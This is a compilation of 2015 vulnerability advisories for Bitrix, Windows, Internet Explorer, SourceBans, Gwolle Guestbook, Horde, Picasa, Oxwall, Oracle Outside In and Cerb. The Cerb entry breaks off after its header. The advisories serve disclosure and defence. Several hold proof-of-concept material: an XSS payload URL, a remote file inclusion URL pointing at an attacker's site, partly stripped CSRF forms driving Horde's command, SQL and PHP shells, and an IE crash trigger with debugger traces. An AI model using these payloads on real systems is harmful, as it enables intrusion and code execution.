Advisory ID: HTB23281 Product: bitrix.mpbuilder Bitrix module Vendor: www.1c-bitrix.ru Vulnerable Version(s): 1.0.10 and probably prior Tested Version: 1.0.10 Advisory Publication: November 18, 2015 [without technical details] Vendor Notification: November 18, 2015 Vendor Patch: November 25, 2015 Public Disclosure: December 9, 2015 Vulnerability Type: PHP File Inclusion [CWE-98] CVE Reference: CVE-2015-8358 Risk Level: Critical CVSSv3 Base Score: 9.6 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H] Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) --- Advisory Details: High-Tech Bridge Security Research Lab discovered vulnerability in bitrix.mpbuilder Bitrix module, which can be exploited to include and execute arbitrary PHP file on the target system with privileges of the web server. The attacker will be able to execute arbitrary system commands and gain complete control over the website. Access to vulnerable modules requires administrative privileges, however the vulnerability can be used by anonymous users via CSRF vector. The vulnerability exists due to insufficient filtration of "work[]" HTTP POST parameter in "/bitrix/admin/bitrix.mpbuilder_step2.php" script before using it in the include() PHP function. A remote attacker can include and execute arbitrary local file on the target system. A simple exploit below will include and execute "/tmp/file" file: http://[host]/bitrix/admin/bitrix.mpbuilder_step2.php?module_id=blog; method="post" name="main"> In a real-world scenario an attacker can use session files to execute arbitrary PHP code. For example, an attacker can change name in his profile to and create a CSRF exploit that will pass arbitrary commands and execute them on the system. The PoC code below executes /bin/ls command using previously created session file with malicious "NAME" value: http://[host]/bitrix/admin/bitrix.mpbuilder_step2.php?module_id=blog; method="post" name="main"> --- Solution: Update to bitrix.mpbuilder module 1.0.12 --- References: [1] High-Tech Bridge Advisory HTB23281 - https://www.htbridge.com/advisory/HTB23281 - PHP File Inclusion in bitrix.mpbuilder Bitrix module [2] bitrix.mpbuilder - https://marketplace.1c-bitrix.ru/solutions/bitrix.mpbuilder/ - Bitrix module for software developers. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. --- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Secunia Research: Microsoft Windows usp10.dll "GetFontDesc()" Integer Underflow Vulnerability
== Secunia Research 08/12/2015 Microsoft Windows usp10.dll "GetFontDesc()" Integer Underflow Vulnerability == Table of Contents Affected Software1 Severity.2 Description of Vulnerability.3 Solution.4 Time Table...5 Credits..6 References...7 About Secunia8 Verification.9 == 1) Affected Software * Microsoft Windows 7 * Microsoft Windows Server 2008 == 2) Severity Rating: Highly critical Impact: System Access Where: From remote == 3) Description of Vulnerability Secunia Research has discovered a vulnerability in Microsoft Windows, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to an integer underflow error within the "GetFontDesc()" function in usp10.dll when processing font files cmap table and can be exploited to cause a heap-based buffer overflow via a font file containing cmap table data with specially crafted offset within encoding records. Successful exploitation allows execution of arbitrary code. == 4) Solution Apply update provided by MS15-130. == 5) Time Table 09/10/2015 - Vendor notified. 12/10/2015 - Vendor response. 17/10/2015 - Status update provided by the vendor. 28/10/2015 - Vendor provides December 2015 as intended fix date. 08/12/2015 - Release of vendor patch and public disclosure. == 6) Credits Discovered by Hossein Lotfi, Secunia Research (now part of Flexera Software). == 7) References The Common Vulnerabilities and Exposures (CVE) project has assigned the CVE-2015-6130 identifier for the vulnerability. == 8) About Secunia (now part of Flexera Software) In September 2015, Secunia has been acquired by Flexera Software: https://secunia.com/blog/435/ Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/products/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/company/jobs/ == 9) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2015-6/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ==
BFS-SA-2015-003: Internet Explorer CObjectElement Use-After-Free Vulnerability
Blue Frost Security GmbH
https://www.bluefrostsecurity.de/ research(at)bluefrostsecurity.de
BFS-SA-2015-003 10-December-2015
Vendor: Microsoft, http://www.microsoft.com
Affected Products: Internet Explorer
Affected Version: IE 11
Vulnerability: MSHTML!CObjectElement Use-After-Free Vulnerability
CVE ID: CVE-2015-6152
I. Impact
This vulnerability allows the execution of arbitrary code on vulnerable
installations of Microsoft Internet Explorer. User interaction is required to
exploit this vulnerability in that the target must visit a malicious page or
open a malicious file.
II. Vulnerability Details
Microsoft Internet Explorer 11 is prone to a use-after-free vulnerability in
the MSHTML!CTreeNode::ComputeFormatsHelper function. The analysis was performed
on Internet Explorer 11 running on Windows 7 SP1 (x64).
The following HTML page can be used to reproduce the issue:
small{ -ms-block-progression: lr; -ms-filter: "vv"; }
function trigger() { document.execCommand("JustifyLeft"); }
bluefrost
security
trigger();
With page heap enabled and the Memory Protect feature turned off, visiting
that page results in the following crash:
(2d4.830): Access violation - code c005 (!!! second chance !!!)
eax=09b09e90 ebx=125b4e60 ecx= edx=6e9fedf0 esi=0f552fa0 edi=0f552fa0
eip=6dfcc19b esp=097fb520 ebp=097fc1f0 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
MSHTML!CTreeNode::ComputeFormatsHelper+0x53:
6dfcc19b f740240300 testdword ptr [eax+24h],3h
ds:002b:09b09eb4=
0:007> !heap -p -a @eax
address 09b09e90 found in
_DPH_HEAP_ROOT @ 9b01000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
9b01f04: 9b09000 2000
748090b2 verifier!AVrfDebugPageHeapFree+0x00c2
77e61b1c ntdll!RtlDebugFreeHeap+0x002f
77e1ae8a ntdll!RtlpFreeHeap+0x005d
77dc2b65 ntdll!RtlFreeHeap+0x0142
758814ad kernel32!HeapFree+0x0014
6d92d219 MSHTML!MemoryProtection::CMemoryProtector::ProtectedFree+0x0122
6dc46583 MSHTML!CObjectElement::`vector deleting destructor'+0x0023
6dfce0db MSHTML!CElement::PrivateRelease+0x027e
6d98953d MSHTML!CObjectElement::DeferredFallback+0x033d
6d96e1b3 MSHTML!GlobalWndOnMethodCall+0x017b
6d95577e MSHTML!GlobalWndProc+0x012e
770762fa user32!InternalCallWinProc+0x0023
77076d3a user32!UserCallWinProcCheckWow+0x0109
770777c4 user32!DispatchMessageWorker+0x03bc
7707788a user32!DispatchMessageW+0x000f
6ebfa7b8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x0464
6ec38de8 IEFRAME!LCIETab_ThreadProc+0x03e7
76a9e81c iertutil!CMemBlockRegistrar::_LoadProcs+0x0067
747b4b01 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x0094
7588336a kernel32!BaseThreadInitThunk+0x000e
77dc9882 ntdll!__RtlUserThreadStart+0x0070
77dc9855 ntdll!_RtlUserThreadStart+0x001b
We can see that a freed CObjectElement object is accessed in the
MSHTML!CTreeNode::ComputeFormatsHelper function. If we take a look at the
memory just before the CObjectElement destructor is called, we can see where
the object was initially allocated.
0:007> bu MSHTML!CObjectElement::~CObjectElement
0:007> g
Breakpoint 0 hit
eax=6daf6b10 ebx= ecx=0980de90 edx=0f834bb0 esi=0980de90 edi=094bc324
eip=6dc4658f esp=094bc310 ebp=094bc318 iopl=0 nv up ei ng nz na pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=0287
MSHTML!CObjectElement::~CObjectElement:
0:007> !heap -p -a poi(@esp+4)
address 09b09e90 found in
_DPH_HEAP_ROOT @ 9b01000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize -
VirtAddr VirtSize)
9b01f04: 9b09e90 170 -
9b09000 2000
MSHTML!CObjectElement::`vftable'
74808e89 verifier!AVrfDebugPageHeapAllocate+0x0229
77e6134e ntdll!RtlDebugAllocateHeap+0x0030
77e1b16e ntdll!RtlpAllocateHeap+0x00c4
77dc2fe3 ntdll!RtlAllocateHeap+0x023a
6daf6a27 MSHTML!CObjectElement::CreateElement+0x0017
6e0423a4 MSHTML!CHtmParse::ParseBeginTag+0x00b8
6df17172 MSHTML!CHtmParse::ParseToken+0x0096
6df16a0f MSHTML!CHtmPost::ProcessTokens+0x04c7
6dd8341b MSHTML!CHtmPost::Exec+0x0207
6da308a8 MSHTML!CHtmPost::Run+0x003d
6da3080e MSHTML!PostManExecute+0x0061
6da2727c
Reflected Cross-Site Scripting (XSS) in SourceBans
Advisory ID: HTB23273 Product: SourceBans Vendor: Sourcebans team Vulnerable Version(s): 1.4.11 and probably prior Tested Version: 1.4.11 Advisory Publication: October 2, 2015 [without technical details] Vendor Notification: October 2, 2015 Public Disclosure: October 22, 2015 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: CVE-2015-8349 Risk Level: Medium CVSSv3 Base Score: 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N] Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) --- Advisory Details: High-Tech Bridge Security Research Lab discovered vulnerability in SourceBans, which can be exploited to perform Cross-Site Scripting (XSS) attacks against web application users. The vulnerability exists due to insufficient filtration of input-data passed via the "advSearch" HTTP GET parameter to "/index.php" script when "p" parameter is set to 'banlist'. A remote unauthenticated attacker can trick any user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. This vulnerability can be used in an advanced attack to compromise the web application and gain control over services within the local network. A simple exploit below will display a JS popup with "ImmuniWeb" word: http://[host]/index.php?p=banlist=0%27%22%3E%3Cimg+src=x+onerror=alert%28/ImmuniWeb/%29%3E=btype --- Solution: Update to SourceBans 2.0 pre-alpha. This version is not vulnerable. --- References: [1] High-Tech Bridge Advisory HTB23273 - https://www.htbridge.com/advisory/HTB23273 - Reflected Cross-Site Scripting (XSS) in SourceBans. [2] SourceBans - http://www.sourcebans.net/ - When running SourceBans web interface and the SourceMod plugin together, you will be able to instantly ban people from all of the servers you have added into the system. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. --- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Remote File Inclusion in Gwolle Guestbook WordPress Plugin
Advisory ID: HTB23275 Product: Gwolle Guestbook WordPress Plugin Vendor: Marcel Pol Vulnerable Version(s): 1.5.3 and probably prior Tested Version: 1.5.3 Advisory Publication: October 14, 2015 [without technical details] Vendor Notification: October 14, 2015 Vendor Patch: October 16, 2015 Public Disclosure: November 4, 2015 Vulnerability Type: PHP File Inclusion [CWE-98] CVE Reference: CVE-2015-8351 Risk Level: Critical CVSSv3 Base Score: 9.0 [CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H] Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) --- Advisory Details: High-Tech Bridge Security Research Lab discovered a critical Remote File Inclusion (RFI) in Gwolle Guestbook WordPress plugin, which can be exploited by non-authenticated attacker to include remote PHP file and execute arbitrary code on the vulnerable system. HTTP GET parameter "abspath" is not being properly sanitized before being used in PHP require() function. A remote attacker can include a file named 'wp-load.php' from arbitrary remote server and execute its content on the vulnerable web server. In order to do so the attacker needs to place a malicious 'wp-load.php' file into his server document root and includes server's URL into request: http://[host]/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://[hackers_website] In order to exploit this vulnerability 'allow_url_include' shall be set to 1. Otherwise, attacker may still include local files and also execute arbitrary code. Successful exploitation of this vulnerability will lead to entire WordPress installation compromise, and may even lead to the entire web server compromise. --- Solution: Update to Gwolle Guestbook 1.5.4 More Information: https://wordpress.org/plugins/gwolle-gb/changelog/ --- References: [1] High-Tech Bridge Advisory HTB23275 - https://www.htbridge.com/advisory/HTB23275 - PHP File Inclusion in Gwolle Guestbook WordPress Plugin. [2] Gwolle Guestbook WordPress Plugin - https://wordpress.org/plugins/gwolle-gb/ - Gwolle Guestbook is the WordPress guestbook you've just been looking for. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. --- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
RCE and SQL injection via CSRF in Horde Groupware
Advisory ID: HTB23272
Product: Horde Groupware
Vendor: http://www.horde.org
Vulnerable Version(s): 5.2.10 and probably prior
Tested Version: 5.2.10
Advisory Publication: September 30, 2015 [without technical details]
Vendor Notification: September 30, 2015
Vendor Patch: October 22, 2015
Public Disclosure: November 18, 2015
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
CVE Reference: CVE-2015-7984
Risk Level: High
CVSSv3 Base Score: 8.3 [CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab (
https://www.htbridge.com/advisory/ )
---
Advisory Details:
High-Tech Bridge Security Research Lab discovered three Cross-Site Request
Forgery (CSRF) vulnerabilities in a popular collaboration suite Horde
Groupware, used by a variety of companies around the world. These
vulnerabilities are very dangerous, since they can be used in targeted attacks
against corporate clients. An attacker might be able to gain unauthorized
access to information, stored in database, execute arbitrary commands on the
server, compromise the entire application and perform attacks against
application users and company’s infrastructure.
1) Cross-Site Request Forgery in Horde Groupware: CVE-2015-7984
1.1 The vulnerability exists due to failure in the "/admin/cmdshell.php" script
to properly verify the source of HTTP request. A remote attacker can trick a
logged-in administrator to visit a malicious page with CSRF exploit and execute
arbitrary system commands on the server.
CSRF exploit below sends HTTP POST request to vulnerable script and instructs
it to display output of "/bin/ls" command. As a result, you will see contents
of "/admin/" directory:
http://[host]/admin/cmdshell.php; method="post" name="main">
document.getElementById('btn').click();
1.2 The vulnerability exists due to failure in the "/admin/sqlshell.php" script
to properly verify the source of HTTP request. A remote attacker can trick a
logged-in administrator to visit a malicious page with CSRF exploit and execute
arbitrary SQL queries with application’s database.
The exploit code below executes "SELECT version()" query and displays version
of current MySQL server:
http://[host]/admin/sqlshell.php; method="post" name="main">
document.getElementById('btn').click();
1.3 The vulnerability exists due to failure in the "/admin/phpshell.php" script
to properly verify the source of HTTP request. A remote attacker can trick a
logged-in administrator to visit a malicious page with CSRF exploit and execute
arbitrary php code on the server.
The exploit code below executes the "phpinfo()" function and displays its
output:
http://[host]/admin/phpshell.php; method="post" name="main">
document.getElementById('btn').click();
---
Solution:
Update to Horde Groupware 5.2.11
More Information:
http://lists.horde.org/archives/announce/2015/001137.html
---
References:
[1] High-Tech Bridge Advisory HTB23272 -
https://www.htbridge.com/advisory/HTB23272 - Multiple CSRF Vulnerabilities in
Horde Groupware.
[2] Horde Groupware - http://www.horde.org - Horde Groupware is a free,
enterprise ready, browser based collaboration suite.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ -
international in scope and free for public use, CVE® is a dictionary of
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to
developers and security practitioners, CWE is a formal list of software
weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual
web application penetration test and cutting-edge vulnerability scanner
available online via a Software-as-a-Service (SaaS) model.
---
Disclaimer: The information provided in this Advisory is provided "as is" and
without any warranty of any kind. Details of this Advisory may be updated in
order to provide as accurate information as possible. The latest version of the
Advisory is available on web page [1] in the References.
Secunia Research: Google Picasa CAMF Section Integer Overflow Vulnerability
== Secunia Research (now part of Flexera Software) 11/11/2015 Google Picasa CAMF Section Integer Overflow Vulnerability == Table of Contents Affected Software1 Severity.2 Description of Vulnerability.3 Solution.4 Time Table...5 Credits..6 References...7 About Secunia8 Verification.9 == 1) Affected Software * Google Picasa version 3.9.140 Build 239 * Google Picasa version 3.9.140 Build 248 NOTE: Prior versions may also be affected. == 2) Severity Rating: Highly critical Impact: System Access Where: From remote == 3) Description of Vulnerability Secunia Research has discovered a vulnerability in Google Picasa, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to an integer overflow error when processing CAMF section in FOVb images and can be exploited to cause a heap-based buffer overflow. Successful exploitation may allow execution of arbitrary code. The vulnerability is confirmed in versions 3.9.140 Build 239 and 3.9.140 Build 248 running on Windows. == 4) Solution Update to version 3.9.140 Build 259. == 5) Time Table 04/08/2015 - Vendor notified of vulnerability. 04/08/2015 - Vendor acknowledges report. 10/08/2015 - Vendor requests PoC. 10/08/2015 - Provision of PoC. 19/08/2015 - Vendor acknowledges receipt. 08/09/2015 - Request of status update. 11/09/2015 - Vendor states fixed in code. ETA not yet available. 19/09/2015 - Vendor states update has been pushed. 25/09/2015 - Vendor notified of incomplete fix of other vulnerability and request status update for this vulnerability. 26/09/2015 - Vendor acknowledges receipt. 05/10/2015 - Request ETA of fix of other vulnerability. Vendor notified that due to public availability of improper fix of other vulnerability, an advisory release deadline on 09/10/2015 is established for the other vulnerability. 06/10/2015 - Vendor acknowledges and estimates 30/10/2015 release of fix. 06/10/2015 - Vendor notified that advisory deadline will still be applicable. 06/10/2015 - Vendor acknowledges and states to send notification once properly fixed. 09/10/2015 - Public disclosure of advisory with SAID SA59000. 12/10/2015 - Public disclosure of research advisory 2015-3. 29/10/2015 - Vendor states fixed status and fix had been verified. 30/10/2015 - Request version number of fix as change log updates and release notes updates are missing. 05/11/2015 - Vendor states fixed version. 11/11/2015 - Release of update of advisory with SAID SA59000 after verification of patched version. 11/11/2015 - Public disclosure of research advisory 2015-5. == 6) Credits Discovered by Hossein Lotfi, Secunia Research (now part of Flexera Software). == 7) References Currently no CVE identifier is assigned. == 8) About Secunia (now part of Flexera Software) In September 2015, Secunia has been acquired by Flexera Software: https://secunia.com/blog/435/ Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/advisories/business_solutions/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently
Cross-Site Request Forgery on Oxwall
Advisory ID: HTB23266
Product: Oxwall
Vendor: http://www.oxwall.org
Vulnerable Version(s): 1.7.4 and probably prior
Tested Version: 1.7.4
Advisory Publication: July 1, 2015 [without technical details]
Vendor Notification: July 1, 2015
Vendor Patch: September 8, 2015
Public Disclosure: October 22, 2015
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
CVE Reference: CVE-2015-5534
Risk Level: High
CVSSv3 Base Score: 7.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab (
https://www.htbridge.com/advisory/ )
---
Advisory Details:
High-Tech Bridge Security Research Lab discovered vulnerability in Oxwall,
which can be exploited to perform CSRF (Cross-Site Request Forgery) attacks. An
attacker might be able to put the website under maintenance and perform XSS
attacks against website visitors.
The vulnerability exists due to failure in the "/admin/pages/maintenance"
script to properly verify the source of the HTTP request. A remote attacker can
trick a logged-in administrator to visit a page with CSRF exploit and put the
entire website under maintenance. Additionally, the attacker is able to inject
arbitrary HTML and JavaScript code into maintenance message and execute it in
browsers of any website visitor. Successful exploitation of this vulnerability
may allow an attacker to steal other users’ cookies, spread malware to website
visitors, and even obtain full control over vulnerable website.
A simple CSRF exploit below puts the website under maintenance and displays a
JS popup with "ImmuniWeb" word to every website visitor:
http://[host]/admin/pages/maintenance; method = "POST">
document.getElementById('btn').click();
---
Solution:
Update to Oxwall 1.8
---
References:
[1] High-Tech Bridge Advisory HTB23266 -
https://www.htbridge.com/advisory/HTB23266 - Cross-Site Request Forgery on
Oxwall.
[2] Oxwall - http://www.oxwall.org/ - Oxwall® is unbelievably flexible and easy
to use PHP/MySQL social networking software platform.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ -
international in scope and free for public use, CVE® is a dictionary of
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to
developers and security practitioners, CWE is a formal list of software
weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual
web application penetration test and cutting-edge vulnerability scanner
available online via a Software-as-a-Service (SaaS) model.
---
Disclaimer: The information provided in this Advisory is provided "as is" and
without any warranty of any kind. Details of this Advisory may be updated in
order to provide as accurate information as possible. The latest version of the
Advisory is available on web page [1] in the References.
Secunia Research: Oracle Outside In Two Buffer Overflow Vulnerabilities
== Secunia Research (now part of Flexera Software) 26/10/2015 Oracle Outside In Two Buffer Overflow Vulnerabilities == Table of Contents Affected Software1 Severity.2 Description of Vulnerabilities...3 Solution.4 Time Table...5 Credits..6 References...7 About Secunia8 Verification.9 == 1) Affected Software * Oracle Outside In versions 8.5.0, 8.5.1, and 8.5.2. == 2) Severity Rating: Moderately critical Impact: System Access Where: From remote == 3) Description of Vulnerabilities Secunia Research has discovered two vulnerabilities in Oracle Outside In Technology, which can be exploited by malicious people to cause a DoS (Denial of Service) and compromise an application using the SDK. 1) An error in the vstga.dll when processing TGA files can be exploited to cause an out-of-bounds write memory access. 2) An error in the libxwd2.dll when processing XWD files can be exploited to cause a stack-based buffer overflow. Successful exploitation of the vulnerabilities may allow execution of arbitrary code. == 4) Solution Apply update. Please see the Oracle Critical Patch Update Advisory for October 2015 for details. == 5) Time Table 14/07/2015 - Vendor notified of vulnerabilities. 14/07/2015 - Vendor acknowledges report. 16/07/2015 - Vendor supplied bug ticket ID. 27/07/2015 - Vendor supplied information of fix in main codeline. 24/09/2015 - Replied to vendor and asked about CVE references. 25/09/2015 - Vendor replied that they check our request. 27/09/2015 - Vendor assigned two CVE references. 17/10/2015 - Vendor supplied 20/10/2015 as estimated fix date. 20/10/2015 - Release of vendor patch. 21/10/2015 - Public disclosure. 26/10/2015 - Publication of research advisory. == 6) Credits Discovered by Behzad Najjarpour Jabbari, Secunia Research (now part of Flexera Software). == 7) References The Common Vulnerabilities and Exposures (CVE) project has assigned the CVE-2015-4877 and CVE-2015-4878 identifiers for the vulnerabilities. == 8) About Secunia (now part of Flexera Software) In September 2015, Secunia has been acquired by Flexera Software: https://secunia.com/blog/435/ Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/advisories/business_solutions/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/corporate/jobs/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/advisories/mailing_lists/ == 9) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2015-04/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ==
Secunia Research: Google Picasa Phase One Tags Processing Integer Overflow Vulnerability
== Secunia Research (now part of Flexera Software) 09/10/2015 Google Picasa Phase One Tags Processing Integer Overflow Vulnerability == Table of Contents Affected Software1 Severity.2 Description of Vulnerability.3 Solution.4 Time Table...5 Credits..6 References...7 About Secunia8 Verification.9 == 1) Affected Software * Google Picasa version 3.9.140 Build 239 * Google Picasa version 3.9.140 Build 248 NOTE: Other versions may also be affected. == 2) Severity Rating: Highly critical Impact: System Access Where: From remote == 3) Description of Vulnerability Secunia Research has discovered a vulnerability in Google Picasa, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to an integer overflow error when processing data related to phase one 0x412 tag and can be exploited to cause a heap-based buffer overflow. Successful exploitation may allow execution of arbitrary code. The vulnerability is confirmed in versions 3.9.140 Build 239 and 3.9.140 Build 248 running on Windows. == 4) Solution The vendor has released a fix in version 3.9.140 Build 248, however, the fix is ineffective. No official solution is currently available. The vendor is currently planning to release a fix on 30th October, 2015. == 5) Time Table 04/08/2015 - Vendor notified of vulnerability. 04/08/2015 - Vendor acknowledges report. 10/08/2015 - Vendor requests PoC. 10/08/2015 - Provision of PoC. 19/08/2015 - Vendor acknowledges receipt. 08/09/2015 - Request of status update. 11/09/2015 - Vendor states fixed in code. ETA not yet available. 19/09/2015 - Vendor states update has been pushed. 25/09/2015 - Vendor notified of incomplete fix. 26/09/2015 - Vendor acknowledges receipt. 05/10/2015 - Request ETA of fix. Vendor notified that due to public availability of improper fix release an advisory release deadline on 09/10/2015 is established. 06/10/2015 - Vendor acknowledges and estimates 30/10/2015 release of fix. 06/10/2015 - Vendor notified that advisory deadline will still be applicable. 06/10/2015 - Vendor acknowledges and states to send notification once properly fixed. 09/10/2015 - Public disclosure of advisory. 12/10/2015 - Public disclosure of research advisory. == 6) Credits Discovered by Hossein Lotfi, Secunia Research (now part of Flexera Software). == 7) References Currently no CVE identifier is assigned. == 8) About Secunia (now part of Flexera Software) In September 2015, Secunia has been acquired by Flexera Software: https://secunia.com/blog/435/ Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/advisories/business_solutions/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/corporate/jobs/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/advisories/mailing_lists/ == 9) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2015-03/ Complete list of vulnerability reports published
Reflected Cross-Site Scripting (XSS) in SourceBans
Advisory ID: HTB23273 Product: SourceBans Vendor: Sourcebans team Vulnerable Version(s): 1.4.11 and probably prior Tested Version: 1.4.11 Advisory Publication: October 2, 2015 [without technical details] Vendor Notification: October 2, 2015 Public Disclosure: October 23, 2015 Vulnerability Type: Cross-Site Scripting [CWE-79] Risk Level: Medium CVSSv3 Base Score: 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N] Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) --- Advisory Details: High-Tech Bridge Security Research Lab discovered vulnerability in SourceBans, which can be exploited to perform Cross-Site Scripting (XSS) attacks against web application users. The vulnerability exists due to insufficient filtration of input-data passed via the "advSearch" HTTP GET parameter to "/index.php" script when "p" parameter is set to 'banlist'. A remote unauthenticated attacker can trick a any user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. This vulnerability can be used in an advanced attack to compromise the web application and gain control over services within the local network. A simple exploit below will display a JS popup with "ImmuniWeb" word: http://[host]/index.php?p=banlist=0%27%22%3E%3Cimg+src=x+onerror=alert%28/ImmuniWeb/%29%3E=btype --- References: [1] High-Tech Bridge Advisory HTB23273 - https://www.htbridge.com/advisory/HTB23273 - Reflected Cross-Site Scripting (XSS) in SourceBans. [2] SourceBans - http://www.sourcebans.net/ - When running SourceBans web interface and the SourceMod plugin together, you will be able to instantly ban people from all of the servers you have added into the system. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. --- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Cross-Site Request Forgery in Cerb
Advisory ID: HTB23269
Product: Cerb
Vendor: Webgroup Media LLC
Vulnerable Version(s): 7.0.3 and probably prior
Tested Version: 7.0.3
Advisory Publication: August 12, 2015 [without technical details]
Vendor Notification: August 12, 2015
Vendor Patch: August 14, 2015
Public Disclosure: September 2, 2015
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
CVE Reference: CVE-2015-6545
